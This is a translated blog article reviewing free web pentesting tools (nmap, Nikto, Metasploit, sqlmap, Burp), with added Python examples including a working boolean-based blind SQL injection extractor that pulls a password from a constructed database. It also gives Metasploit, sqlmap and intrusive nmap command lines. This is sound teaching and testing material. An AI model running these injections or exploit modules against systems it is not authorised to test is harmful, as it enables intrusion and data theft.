I wrote this a little while ago.
Free Web Application Pentester Tools
This article covers the most popular tools for penetration testing of web applications using the "black box" strategy.
To do that, we will look at the utilities that help with this kind of testing. Consider the following product categories:
- Network scanners
- Web script vulnerability scanners
- Exploitation
- Injection automation
- Debuggers (sniffers, local proxies, etc.)
Some products are universal and fit more than one category, so I will file each under the category where it gives the best results (subjective opinion).
Network scanners
Their main task is to discover the available network services, determine their versions, identify the OS, and so on.
Nmap
It is not just a "smart scanner" but a full-blown extensible tool (one of its "unusual features" is the set of scripts that check whether a host is infected with a worm).
nmap -A -T4 localhost
-A: OS and version detection, script scanning and traceroute
-T4: timing template (0 to 5; higher is faster)
localhost: the target host
Something harsher?
nmap -sS -sU -T4 -A -v -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 -PO --script all localhost
This is the option set from Zenmap's "Slow comprehensive scan" profile. It takes quite a while to finish, but in the end you get much more detailed information about the target system. Note that --script all runs every NSE script, including those in the intrusive, dos and exploit categories, so only point it at hosts you are authorised to test; --script "default or safe" is the conservative alternative.
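Scans like the ones above are far easier to post-process from nmap's XML output (`-oX scan.xml`) than from the terminal text. The following is an added example, not code from the article: a small parser for that XML that keeps only confirmed open ports and the top OS guess. The XML document embedded in it is constructed by hand for the example and follows the element names nmap uses (nmaprun, host, ports, port, state, service, os/osmatch).

```python
# Added example: parse nmap -oX output. The XML below is constructed for
# this example; the element/attribute names follow nmap's XML format.
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -A -T4 -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
        <service name="https"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered"/>
        <service name="snmp"/>
      </port>
    </ports>
    <os>
      <osmatch name="Linux 3.10 - 4.11" accuracy="96"/>
      <osmatch name="Linux 3.2 - 4.9" accuracy="93"/>
    </os>
  </host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return one dict per host that is up: address, best OS guess, open ports.

    Only ports whose state is exactly "open" go into "open"; "open|filtered"
    (what -sU usually reports for UDP) is kept apart so it is not mistaken
    for a confirmed service.
    """
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']") or host.find("address")
        entry = {"address": addr_el.get("addr") if addr_el is not None else None,
                 "os": None, "open": [], "open_filtered": []}
        # nmap lists osmatch elements best-first; keep the top one
        osmatch = host.find("os/osmatch")
        if osmatch is not None:
            entry["os"] = (osmatch.get("name"), int(osmatch.get("accuracy", "0")))
        for port in host.findall("ports/port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            record = {
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            }
            if state == "open":
                entry["open"].append(record)
            elif state == "open|filtered":
                entry["open_filtered"].append(record)
        hosts.append(entry)
    return hosts

def versioned_services(hosts):
    """Flatten to (address, port, product, version) for services nmap could fingerprint."""
    return [(h["address"], p["port"], p["product"], p["version"])
            for h in hosts for p in h["open"] if p["product"] and p["version"]]

if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["address"], "OS guess:", h["os"])
        for p in h["open"]:
            print("  %d/%s %s %s %s" % (p["port"], p["proto"], p["service"],
                                       p["product"] or "", p["version"] or ""))
```

The versioned list is what you feed into the exploitation step later in the article: a product and version string is what an exploit database is searched with.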
Nmap has won "Security Product of the Year" from magazines and communities such as Linux Journal, InfoWorld, LinuxQuestions.Org and Codetalker Digest.
An interesting detail: Nmap appears in the films The Matrix Reloaded, Die Hard 4, The Bourne Ultimatum, Khottabych and others.
IP-Tools
A port scanner, shared resources (shared printers/folders), WhoIs/Finger/Lookup, a Telnet client and more. A handy, fast and functional tool.
There are many utilities in this area, but they all work on similar principles with similar features, so there is little point in reviewing other products. Even so, nmap remains the most commonly used.
Web script vulnerability scanners
These try to find common vulnerabilities (SQL injection, XSS, LFI/RFI, etc.) or mistakes (temporary files that were not deleted, directory indexing, etc.).
Acunetix Web Vulnerability Scanner
Among other things, when it finds a popular script it checks whether a released exploit for it exists (in its database).
It reports available "unnecessary" methods such as PUT, TRACE, etc.
If you work as an auditor and analyse web sites every day, it is very handy.
Nikto
Among the minuses, I want to point out the high rate of false positives. For example, if a site always returns its main page instead of a 404 error, the scan will decide that the site contains every script and every vulnerability from its database. In practice this does not happen that often, but it does depend heavily on how the site is built.
Classic usage:
./nikto.pl -host localhost
If the site requires authentication, you can set a cookie in the STATIC-COOKIE variable of the nikto.conf file.
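Two of the checks mentioned above are simple enough to write yourself, and doing so shows why the Nikto false positive happens. The following is an added example, not code from the article, from Acunetix or from Nikto. It starts two tiny local HTTP servers constructed for the example (one that answers 200 with its main page for every URL and accepts PUT and TRACE, one that behaves), then runs the "unnecessary methods" report described for Acunetix and the baseline request that a scanner must make before trusting any "found" path: ask for a path that cannot exist and compare the answer with the main page.

```python
# Added example: "unnecessary methods" report and a soft-404 baseline check
# against two constructed local targets. Not code from Acunetix or Nikto.
import difflib
import http.server
import secrets
import socketserver
import threading
import urllib.error
import urllib.request

MAIN_PAGE = b"<html><body><h1>Welcome to the shop</h1><p>news, catalog, contacts</p></body></html>"

class SoftNotFoundHandler(http.server.BaseHTTPRequestHandler):
    """Constructed target: answers 200 with the main page for every path
    (the false-positive trap described above) and accepts PUT and TRACE."""
    allow = "GET, HEAD, POST, PUT, OPTIONS, TRACE"

    def log_message(self, *args):
        pass

    def _send(self, code, body, ctype="text/html"):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._send(200, MAIN_PAGE)

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", self.allow)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_TRACE(self):
        # A server with TRACE enabled echoes the request back to the client
        self._send(200, (self.requestline + "\r\n").encode(), "message/http")

class StrictHandler(SoftNotFoundHandler):
    """Constructed target that behaves: real 404s, no PUT, TRACE refused."""
    allow = "GET, HEAD, POST, OPTIONS"

    def do_GET(self):
        if self.path == "/":
            self._send(200, MAIN_PAGE)
        else:
            self._send(404, b"<html><body>Not Found</body></html>")

    def do_TRACE(self):
        self._send(405, b"")

def start_server(handler):
    """Serve `handler` on a random loopback port in a background thread."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_address[1], srv

def request(base, method, path="/"):
    """Return (status, headers, body); HTTP error statuses are results, not exceptions."""
    req = urllib.request.Request(base + path, method=method)
    try:
        with urllib.request.urlopen(req, timeout=5) as r:
            return r.status, r.headers, r.read()
    except urllib.error.HTTPError as e:
        return e.code, e.headers, e.read()

def unnecessary_methods(base):
    """Methods a scanner would flag: anything in Allow beyond GET/HEAD/POST/OPTIONS,
    plus TRACE when the server actually echoes (the Allow header alone is not proof)."""
    _, headers, _ = request(base, "OPTIONS")
    allowed = {m.strip().upper() for m in headers.get("Allow", "").split(",") if m.strip()}
    flagged = sorted(allowed - {"GET", "HEAD", "POST", "OPTIONS"})
    status, _, body = request(base, "TRACE")
    if status == 200 and b"TRACE /" in body and "TRACE" not in flagged:
        flagged.append("TRACE")
    return flagged

def has_soft_404(base):
    """Baseline: request a path that cannot exist. A 200 whose body matches the
    main page means every 'found' entry from a wordlist would be a false positive."""
    _, _, home = request(base, "GET", "/")
    status, _, body = request(base, "GET", "/" + secrets.token_hex(12) + ".php")
    return status == 200 and difflib.SequenceMatcher(None, home, body).ratio() > 0.9

def path_exists(base, path):
    """Trust a 200 for a guessed path only when the site returns real 404s;
    None means the answer cannot be known from status codes alone."""
    if has_soft_404(base):
        return None
    return request(base, "GET", path)[0] == 200

if __name__ == "__main__":
    for name, handler in (("soft-404 site", SoftNotFoundHandler), ("strict site", StrictHandler)):
        base, srv = start_server(handler)
        print(name, "| flagged methods:", unnecessary_methods(base),
              "| soft 404:", has_soft_404(base), "| /admin.php:", path_exists(base, "/admin.php"))
        srv.shutdown()
        srv.server_close()
```

The body comparison matters more than the status code: many sites return 200 for unknown paths but with a distinct "not found" page, and comparing against the main page (or, better, against a second random path) tells those apart from the case Nikto chokes on.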
Wikto
skipfish
General usage:
The report, in HTML format, is placed in the "reports" folder.
w3af
One could talk about its advantages at length, but it is better to try it yourself :] Typical work with it comes down to choosing a profile, specifying the target and, in fact, launching the scan.
Mantra Security Framework
Very useful when testing a web application at every stage.
Using it comes down to installing and launching the browser.
In fact there are a great many utilities in this category, and picking specific ones is very hard. In most cases each pentester decides on the set of tools they need.
Exploitation
To automate the exploitation of vulnerabilities and make it more convenient, exploits are written as programs and scripts, so using one comes down to passing it parameters. There are also products that spare you searching for exploits by hand and apply them on the spot. This category is discussed here.
Metasploit Framework
It simply automates working with the required exploit. For example:
msf > use auxiliary/admin/cisco/vpn_3000_ftp_bypass
msf auxiliary(vpn_3000_ftp_bypass) > set RHOST [TARGET IP]
msf auxiliary(vpn_3000_ftp_bypass) > run
In fact the framework's capabilities are extremely broad, so if you want to know more, visit its site.
Armitage
Screencast:
Tenable Nessus®
Usage:
- Download (for your system), install, register (the key is sent by e-mail).
- Start the server and add a user in Nessus Server Manager (the "Manage users" button).
- Go to https://localhost:8834/ in a browser and get the Flash client.
- Scans -> Add -> fill in the fields (choosing a suitable scan profile) and click Scan.
After a while the scan report appears in the Reports tab.
To check whether the services are really vulnerable to an exploit, you can use the Metasploit Framework described above, or find an exploit (for example,
IMHO: excellent. I would count it among the leaders in this area of the software industry.
Injection automation
Many web application security scanners look for injections, but they are still just general-purpose scanners. There are also utilities that specialise in finding and exploiting injections. Those are covered here.
sqlmap
Typical usage comes down to one line:
python sqlmap.py -u "http://example.com/index.php?action=news&id=1"
There is plenty of documentation, including in Russian. The software greatly eases a pentester's work in this area.
I will add the official demo video.
bsqlbf-v2
Supported databases:
- MS SQL
- MySQL
- PostgreSQL
- Oracle
Usage example:
-url: the target URL
-blind: the parameter to inject into (by default the last parameter in the URL is taken)
-sql "select table_name from information_schema.tables limit 1 offset 0": an arbitrary query against the database
-database 1: the database server; 1 = MSSQL
-type 1: the attack type; "blind" injection based on True and Error (syntax error, etc.) responses
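Both sqlmap (against an id parameter like the one in its usage line) and bsqlbf's -type 1 mode do the same thing underneath: ask the application a long series of yes/no questions through the injectable parameter and read the answer from whether a normal page or an error/empty page comes back. The following is an added example, not code from the article or from either tool, that runs that boolean-based blind technique against a deliberately vulnerable query on an in-memory SQLite database constructed for the example; the function vulnerable_news() stands in for index.php?action=news&id=..., and the binary search over the character code is the trick that keeps the request count down.

```python
# Added example: boolean-based blind SQL injection, the technique sqlmap and
# bsqlbf automate, against a constructed SQLite-backed "page". Not their code.
import sqlite3

# Constructed for this example: a "news" table the page reads from and a
# "users" table the attacker wants to read.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
INSERT INTO news VALUES (1, 'Welcome'), (2, 'Maintenance window');
INSERT INTO users VALUES (1, 'admin', 's3cr3t-pw');
""")

request_log = []  # one entry per "request" the attacker sends to the page

def vulnerable_news(id_param):
    """Stand-in for index.php?action=news&id=<id_param> where the id is
    concatenated into the SQL. The caller sees only whether an item came back."""
    request_log.append(id_param)
    try:
        row = conn.execute("SELECT title FROM news WHERE id = " + id_param).fetchone()
    except sqlite3.Error:
        return False  # a syntax error also renders as "no news item"
    return row is not None

def oracle(condition):
    """One yes/no question, asked through the injectable parameter."""
    return vulnerable_news("1 AND (" + condition + ")")

def extract_string(query, max_len=64):
    """Recover the single-value result of `query` one character at a time.
    Binary search over the character code costs 7 questions per character
    instead of up to 128 (SQLite's unicode() returns the code point)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle("length((%s)) >= %d" % (query, pos)):
            break  # past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s), %d, 1)) > %d" % (query, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

def safe_news(id_param):
    """The fix: validate the type and bind the value, so the same payloads are
    a rejected parameter rather than SQL."""
    if not id_param.isdigit():
        return False
    row = conn.execute("SELECT title FROM news WHERE id = ?", (int(id_param),)).fetchone()
    return row is not None

if __name__ == "__main__":
    request_log.clear()
    secret = extract_string("SELECT password FROM users WHERE login = 'admin'")
    print("extracted %r in %d requests" % (secret, len(request_log)))
```

Each character costs one length probe plus seven comparisons, so a nine-character password takes 73 requests; that is the kind of volume the real tools generate, and why their traffic is easy to spot in access logs.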
Debuggers
These tools are mainly used by developers when something goes wrong with the result of running their code. But they are also useful for penetration testing, where you can substitute the needed data on the fly and analyse what comes back in response to the input parameters (for example, during fuzzing).
Burp Suite
The free version includes:
- Burp Proxy: a local proxy that lets you modify requests already generated by the browser
- Burp Spider: a spider that looks for existing files and directories
- Burp Repeater: sends HTTP requests by hand
- Burp Sequencer: analyses random values in forms
- Burp Decoder: the standard encoders/decoders (html, base64, hex, etc.), of which there are thousands in any programming language
- Burp Comparer: a string comparison component
In principle, this package solves almost every problem in this area.
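What Burp Sequencer does with a sample of session tokens or form nonces can be approximated in a few lines, which makes the idea clearer than the tool's charts. The following is an added example, not the article's or Burp's code: two token generators constructed for comparison (a counter hidden behind a fixed prefix, and tokens from the secrets module), and three checks on a sample of each, per-position entropy, positions that never change, and whether consecutive values look like a counter.

```python
# Added example: Sequencer-style checks on a sample of tokens. The two
# generators are constructed for the comparison; not Burp's code.
import math
import secrets
from collections import Counter

def weak_tokens(n):
    """Constructed weak generator: looks like 16 hex chars but is a counter."""
    return ["sess" + format(i, "012x") for i in range(1, n + 1)]

def strong_tokens(n):
    """64-bit tokens from the OS CSPRNG, for comparison."""
    return [secrets.token_hex(8) for _ in range(n)]

def shannon_bits(symbols):
    total = len(symbols)
    return -sum((k / total) * math.log2(k / total) for k in Counter(symbols).values())

def token_entropy(tokens):
    """Sum of per-position Shannon entropy over the sample, in bits.
    A 16-char hex token can reach at most 64; positions that never change add 0."""
    length = len(tokens[0])
    if any(len(t) != length for t in tokens):
        raise ValueError("tokens must have the same length")
    return sum(shannon_bits([t[i] for t in tokens]) for i in range(length))

def constant_positions(tokens):
    """Character positions whose value is the same in every sampled token."""
    return [i for i in range(len(tokens[0])) if len({t[i] for t in tokens}) == 1]

def counter_like(tokens):
    """Fraction of consecutive tokens that differ in at most two positions;
    near 1.0 means the values step up rather than being drawn at random."""
    pairs = list(zip(tokens, tokens[1:]))
    close = sum(1 for a, b in pairs if sum(x != y for x, y in zip(a, b)) <= 2)
    return close / len(pairs)

def assess(tokens):
    return {"bits": round(token_entropy(tokens), 1),
            "constant_positions": constant_positions(tokens),
            "counter_like": round(counter_like(tokens), 2)}

if __name__ == "__main__":
    print("weak  :", assess(weak_tokens(200)))
    print("strong:", assess(strong_tokens(200)))
```

Per-position entropy is an upper bound, not a proof of randomness: a token made from a good hash of a counter would score full marks here while still being predictable, which is why the counter_like check (and, in Burp, the bit-level and correlation tests) is run alongside it.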
Fiddler
Summary
Naturally, every pentester has their own arsenal and their own utilities, simply because there are so many of them. I have tried to list some of the most handy and popular ones. But so that everyone can get acquainted with other utilities in this area, here are the links:
Various tops/lists of scanners and utilities:
- Security and hacking tools
- Top 100 network security tools
- Top 10 web vulnerability scanners
- Top 10 vulnerability scanners
- OWASP Top 10 tools and tactics
- Web-based application security scanners
- WebAppSec
- Another list of web application security scanners
- Infosec utilities from the RDot forum
- Vulnerability scanner (Wikipedia)
Linux distributions that already include various penetration-testing utilities
Update:
I cannot keep quiet about PSpider. It is shareware and did not take part in the review (I learned about it when I sent the article to SecLab, and in fact it was because of it (not knowing it and not having the latest version 7.8) that I did not include it in the article). A review of it is planned in theory (I have a hungry host ready for it), but whether it will see the light of day, I do not know.
PPS Some of the article's material is used for its intended purpose in the following report.
By the way, related to this article: InfoSec Open Day (
Source: habr.com